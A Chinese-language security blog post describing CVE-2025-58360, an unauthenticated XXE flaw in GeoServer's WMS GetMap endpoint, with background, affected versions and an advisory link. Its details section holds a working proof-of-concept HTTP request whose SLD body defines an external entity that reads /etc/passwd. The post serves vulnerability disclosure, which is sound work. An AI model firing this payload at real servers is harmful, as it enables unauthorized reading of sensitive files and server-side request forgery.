文章总结： GeoServer存在XXE漏洞CVE-2025-58360，影响版本2.25.6以下和2.26.0至2.26.1。攻击者可通过WMSGetMap请求注入恶意XML实体，读取敏感文件或导致SSRF。建议升级到安全版本以缓解风险。 综合评分： 81 文章分类： 漏洞分析,WEB安全,漏洞POC

CVE-2025-58360｜GeoServer未经授权的XML外部实体注入漏洞（POC）

alicy

信安百科

2025年12月6日 18:00 河北

0x00 前言

GeoServer是基于Java 的软件服务器，允许用户查看和编辑地理空间数据。使用开放地理空间联盟（OGC）提出的开放标准，GeoServer在地图创建和数据共享方面具有极大的灵活性。

GeoServer允许您向世界显示您的空间信息。实施Web地图服务（WMS）标准，GeoServer可以创建各种输出格式的地图。一个免费的地图库 OpenLayers 已集成到GeoServer中，从而使地图生成快速简便。GeoServer基于GeoTools（一种开放源 Java GIS 工具包）构建。

兼容WMS和WFS特性，支持PostgreSQL、Shapefile、ArcSDE、Oracle、VPF、MySQL、MapInfo，支持上百种投影，能够将网络地图输出为jpeg、gif、png、SVG、KML等格式，能够运行在任何基于J2EE/Servlet容器之上，嵌入MapBuilder支持AJAX的地图客户端OpenLayers，除此之外还包括许多其他的特性。

0x01 漏洞描述

GeoServer XML外部实体注入漏洞（XXE）漏洞存在于/geoserver/wms端点的WMS GetMap请求中。当服务器接收XML形式的SLD样式定义时，由于解析器未正确禁用外部实体，攻击者可构造恶意XML注入实体引用，进而：

• 读取服务器任意敏感文件（/etc/passwd、配置文件等）
• 获取系统信息
• 触发 SSRF（取决于解析器实现）
• 或导致拒绝服务

0x02 CVE编号

CVE-2025-58360

0x03 影响版本

GeoServer&nbsp;<&nbsp;2.25.62.26.0&nbsp;<= GeoServer <&nbsp;2.26.2

0x04 漏洞详情

POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&layers=topp:states&bbox=-130,24,-66,50&width=800&height=400&srs=EPSG:4326&format=image/png HTTP/1.1Host: ipContent-Type: application/vnd.ogc.sld+xml
<?xml version="1.0"&nbsp;encoding="UTF-8"?>&nbsp;&nbsp;<!DOCTYPE&nbsp;StyledLayerDescriptor&nbsp;[&nbsp;&nbsp;<!ENTITY&nbsp;xxe&nbsp;SYSTEM&nbsp;"file:///etc/passwd">&nbsp; ]><StyledLayerDescriptor&nbsp;version="1.0.0"&nbsp;xmlns="http://www.opengis.net/sld">&nbsp;&nbsp;<NamedLayer>&nbsp; &nbsp;&nbsp;<Name>&xxe;</Name>&nbsp; &nbsp;&nbsp;<UserStyle/>&nbsp;&nbsp;</NamedLayer></StyledLayerDescriptor>

0x05 参考链接

https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525

推荐阅读：

CVE-2025-30220｜GeoServer XXE漏洞

CVE-2024-36401｜GeoServer 未授权远程代码执行漏洞（POC）

CVE-2025-58034｜Fortinet FortiWeb命令注入漏洞（POC）

Ps：国内外安全热点分享，欢迎大家分享、转载，请保证文章的完整性。文章中出现敏感信息和侵权内容，请联系作者删除信息。信息安全任重道远，感谢您的支持！！！

本公众号的文章及工具仅提供学习参考，由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害，均由使用者本人负责,本公众号及文章作者不为此承担任何责任。